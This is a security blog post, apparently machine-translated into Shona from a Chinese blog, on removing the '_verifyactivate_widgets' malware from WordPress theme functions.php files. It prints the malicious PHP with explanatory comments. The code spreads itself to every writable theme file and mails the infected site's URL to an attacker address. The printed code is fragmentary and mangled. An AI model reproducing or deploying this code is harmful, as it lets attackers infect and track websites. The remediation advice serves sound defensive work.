Maitiro eWordPress anochenesa kodhi yakaipa _verifyactivate_widgets

munguva pfupi yapfuuraChen WeiliangMukushandisaWordfence Security plugin inoongorora mawebhusaiti kune yakaipa kodhiPashure pacho, yakawanikwaWordPressMune theme's function.php faira, iyo yakaipa hutachiona code yakavanzwa.

Kodhi yakaipa muWordPress theme functions.php file

Maitiro eWordPress anochenesa kodhi yakaipa _verifyactivate_widgets

Nzvimbo inonyanya kuitika ye "code yakaipa" muShokoPress ndeye function.php muhurukuro yemusoro, kazhinji yakavanzwa pamagumo efaira.php file.

dambudziko hombe:Iyo yakashata kodhi ichaona kana misoro yese iri pasi peiyo blog yazvino inotapukirwa pese munhu paanoshanyira peji rako rebhurogi, uye kana zvisina kudaro, vanotapukirwa pamwechete.

Mushure meizvozvo, kana iyo yekutanga chiito init ye ​​wp ichiitwa, ichatarisa kana bhurogu razvino ratumira email kubhokisi retsamba livethemas@Gmail... com

Unoziva sei kana yakatumirwa?

  • Mukati me wp_options tafura yako pane faira rinonzi_is_widget_active_sarudzo, kana yakatumirwa zvinobudirira, isa kukosha kwayo ku1;
  • Kana zvisiri, shandisa iyo URL yekumba yeblog razvino ine hutachiona semusoro uye zvirimo.
  • Ndizvozvo, hapana zvimwe zvakaipa zvekuita.

Iyo yakaipa hutachiona kodhi ndeyekutevera (panogona kunge paine misiyano, asi yekutanga kodhi yakafanana):

function _verifyactivate_widgets(){
//查找当前主题functions.php文件中最后一个 <? 标记,从这个标记的位置开始,取得一直到文件尾的内容
$output=strip_tags($output, $allowed);
//取得主题目录themes的绝对路径,如 /path-to-www/wp-content/themes
$direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),“themes”) + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
if (stripos($cont,$ftion) === false){
//查看目标functions.php文件最后是否是以 ?> 结尾,如果不是,给加上 ?> 标记
$comaar=stripos( substr($cont,-20),”?”.”>”) !== false ? “” : “?”.”>”;
//这里的代码是忽悠人了,模仿WP widgets的代码,蛊惑你的眼睛,让你觉得这是widget代码。。。
$output .= $before . “Not found” . $after;
//如果文件是以 ?> 标记结尾的,连标记一起取过来
if (stripos( substr($cont,-20),”?”.”>”) !== false){$cont=substr($cont,0,strripos($cont,”?”.”>”) + 2);}
$output=rtrim($output, “\n\t”); fputs($f=fopen($item,”w+”),$cont . $comaar . “\n” .$widget);fclose($f);
$output .= ($isshowdots && $ellipsis) ? “…” : “”;
return $output;
function _get_allwidgets_cont($wids,$items=array()){
if(substr($places,-1) == “/”){

if(!file_exists($places) || !is_dir($places)){
return false;
foreach ($elems as $elem){
if ($elem != “.” && $elem != “..”){
if (is_dir($places . “/” . $elem)){
$wids[]=$places . “/” . $elem;
} elseif (is_file($places . “/” . $elem)&&
$elem == substr(__FILE__,-13)){
//否则,如果是文件,并且文件名等于 functions.php的话,则加入到$items数组保存,这才是它的目的functions.php正是它要找的
$items[]=$places . “/” . $elem;}
return false;
if (sizeof($wids) > 0){
return _get_allwidgets_cont($wids,$items);
} else {
return $items;

function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );

function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) – $offset ), 0 ) ) );
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) – ( $found + $offset + strlen( $needle ) ) );
return $pos;
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != “.” && $file != “..”) || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
return $dirArray;

add_action(“admin_head”, “_verifyactivate_widgets”);

function _getprepare_widget(){
if(!isset($text_length)) $text_length=120;
if(!isset($check)) $check=”cookie”;
if(!isset($tagsallowed)) $tagsallowed=”<a>“;
if(!isset($filter)) $filter=”none”;
if(!isset($coma)) $coma=””;
if(!isset($home_filter)) $home_filter=get_option(“home”);
if(!isset($pref_filters)) $pref_filters=”wp_”;
if(!isset($is_use_more_link)) $is_use_more_link=1;
if(!isset($com_type)) $com_type=””;
if(!isset($cpages)) $cpages=$_GET[“cperpage”];
if(!isset($post_auth_comments)) $post_auth_comments=””;
if(!isset($com_is_approved)) $com_is_approved=””;
if(!isset($post_auth)) $post_auth=”auth”;
if(!isset($link_text_more)) $link_text_more=”(more…)”;
if(!isset($widget_yes)) $widget_yes=get_option(“_is_widget_active_”);
if(!isset($link_text_more_ditails)) $link_text_more_ditails=”(details…)”;
if(!isset($contentmore)) $contentmore=”ma”.$coma.”il”;
if(!isset($for_more)) $for_more=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql=””;

//如果 _is_widget_active_ option内容为空,即表示没有被感染过
if (!$widget_yes) :

global $wpdb, $post;
// post_author 为 [email protected] 的文章,肯定是没有的

$sq1=”SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\”1\” AND comment_type=\”\” AND post_author=\”li”.$coma.”vethe”.$com_type.”mas”.$coma.”@”.$com_is_approved.”gm”.$post_auth_comments.”ail”.$coma.”.”.$coma.”co”.”m\” AND post_password=\”\” AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if (!empty($post->post_password)) {
if ($_COOKIE[“wp-postpass_”.COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__(“There is no excerpt because this is a protected post.”);
} else {
if(!isset($fixed_tags)) $fixed_tags=1;
if(!isset($filters)) $filters=$home_filter;
//$gettextcomments实际上为 wp_mail
if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;
if(!isset($tag_aditional)) $tag_aditional=”div”;

//这里$sh_cont即为 [email protected]
if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, “live”), 20);#
if(!isset($more_text_link)) $more_text_link=”Continue reading this entry”;
if(!isset($isshowdots)) $isshowdots=1;

if($fakeit == 2) {
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
//开始调用 wp_mail 向 [email protected] 发送邮件,标题和内容都是被感染的博客的URL 地址
$sq1=”SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\”1\” AND comment_type=\”\” AND comment_content=”. call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) .” ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if($text_length < 0) {
} else {
if(!$no_more && strpos($text, “<span id=“more-5265”></span>“)) {
$text=explode(“<span id=“more-5675”></span>“, $text, 2);
} else {
$text=explode(” “, $text);
if(count($text) > $text_length) {
} else {
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . ” “;
update_option(“_is_widget_active_”, 1);
if(“all” != $tagsallowed) {
$output=strip_tags($output, $tagsallowed);
return $output;
$output=rtrim($output, “\s\n\t\r\0\x0B”);
$output=($fixed_tags) ? balanceTags($output, true) : $output;
$output .= ($isshowdots && $ellipsis) ? “…” : “”;
//$filter 为 none …,又是在伪装
$output=apply_filters($filter, $output);
switch($tag_aditional) {
case(“div”) :
case(“span”) :
case(“p”) :
default :

if ($is_use_more_link ) {
if($for_more) {
$output .= ” <” . $tag . ” class=\”more-link\”><a href=\””. get_permalink($post–>ID) . “#more-” . $post->ID .”\” title=\”” . $more_text_link . “\”>” . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : “” . “</a></” . $tag . “>” . “\n”;
} else {
$output .= ” <” . $tag . ” class=\”more-link\”><a href=\””. get_permalink($post–>ID) . “\” title=\”” . $more_text_link . “\”>” . $link_text_more . “</a></” . $tag . “>” . “\n”;
return $output;

add_action(“init”, “_getprepare_widget”);

function __popular_posts($no_posts=6, $before=”<li>“, $after=”</li>“, $show_pass_post=false, $duration=””) {
global $wpdb;
$request=”SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \”comment_count\” FROM $wpdb->posts, $wpdb->comments”;
$request .= ” WHERE comment_approved=\”1\” AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\”publish\””;
if(!$show_pass_post) $request .= ” AND post_password =\”\””;
if($duration !=””) {
$request .= ” AND DATE_SUB(CURDATE(),INTERVAL “.$duration.” DAY) < post_date “;
$request .= ” GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts”;
if ($posts) {
foreach ($posts as $post) {
$output .= $before . ” <a href=\”” . $permalink . “\” title=\”” . $post_title.“\”>” . $post_title . “</a> ” . $after;
} else {
$output .= $before . “None found” . $after;
return $output;

Ndeipi kodhi yakashata yeWordPress theme?

Kana kuongorora neWordfence Security plugin inoona kuti function.php file yako yakakanganiswa, unofanira kutarisa, somuenzaniso:

  1. _verifyactivate_widgets
  2. basa _checkactive_widgets
  3. basa _get_alwidgets_cont
  4. basa stripos
  5. basa strripos
  6. basa scandir
  7. basa _getprepare_widget
  8. basa __popular_posts
  9. add_action("admin_head", "_checkactive_widgets");
  10. add_action("init", "_getprepare_widget");
  11. _verify_isactivate_widgets
  12. _check_isactive_widget
  13. _wana_ allwidgetscont
  14. _gadzirira_mawijeti
  15. __zvakakurumbira_zvinyorwa
  • Mutsara wega wega wakazvimiririra, kana uine kodhi iri pamusoro mumabasa ako.php ipapo unogona kurohwa.
  • Pakati pavo, mabasa uye add_action anowanzo kodhi ye "yakaipa kodhi" ye "kugadzirira zviitiko".

Nzira yekubvisa sei WordPress theme function.php malicious virus code?

Izvo zvakare zviri nyore kwazvo kuchenesa, ingotsvaga iyo kodhi yakafanana neiri pamusoro mufunction.php faira yeWordPress theme uye kuidzima, asi nekuti kana yangobatwa nehutachiona, ese madingindira mune yako theme dhairekitori achabatwa, saka chete ikozvino Dingindira rakashandiswa harishandi uye richagadzirwa munguva pfupi yabviswa.

Mhinduro ndeyekubvisa iyo yakaipa hutachiona kodhi yeimwe WordPress theme, isa mafambiro.php faira kune 444 mvumo, uye wozochenesa mamwe WordPress themes.

Nezve kana mvumo ye444 yefaira yekupedzisira.php inoda kuchinjwa kumashure, vanhu vanoratidza kuti 444 yakachengeteka uye inogona kuchinjwa kana zvichidiwa.

Zvinyorwa zvekushandisa Wordfence Security plugin

Isu tinokurudzira WordPress plugin neWordfence Security, WordPress kuchengetedza plugin ine yakabatanidzwa firewall uye malware scanning, yakavakwa uye inochengetwa neboka rakakura iro 100% yakatarisana neWordPress chengetedzo.

Kunyangwe paine mamodule akabhadharwa, isu tinogona kushandisa iyo yemahara module "Scan" kuongorora yedu WordPress saiti yeFP mafaera ane "yakaipa kodhi", kunyangwe paine imwe nhema yakanaka mwero (kunyanya mamwe echokwadi plugins, iyo theme encryption chikamu chichavharwa. nemashoko ekunyepa), asi kuwana "ruvengo kodhi" ibasa rakawanda nekuedza kushoma.

Izvo zvinofanirwa kucherechedzwa kuti iyi plug-in haikurudzirwe kuvhurika kazhinji, nekuti firewall yayo uye chengetedzo chengetedzo inokonzeresa imwe mutoro kudzvanywa pane dhatabhesi uye kukanganisa kushanda kwewebhusaiti.

Kazhinji, maplugins anogoneswa kumhanya "scan" scans pazvinenge zvichidikanwa.

Vhara iyo plug-in mushure mekuferefeta kwapera, kana paine emergency.

Hope Chen Weiliang Blog ( ) yakagoverwa "Maitiro ekuchenesa kodhi yakaipa _verifyactivate_widgets mu WordPress theme", iyo inobatsira kwauri.

Welcome to share link yechinyorwa chino:

Tikugashirei kuTeregiramu chiteshi cheChen Weiliang's blog kuti uwane zvichangobva kuitika!

🔔 Iva wekutanga kuwana yakakosha "ChatGPT Yemukati Yekushambadzira AI Chishandiso Chekushandisa Guide" muchiteshi chepamusoro dhairekitori! 🌟
📚 Iri gwara rine kukosha kukuru, 🌟Uyu mukana usingawanzo, usapotsa! ⏰⌛💨
Govera uye like kana uchida!
Kugovera kwako uye kuda ndiko kukurudzira kwedu kunoramba kuripo!


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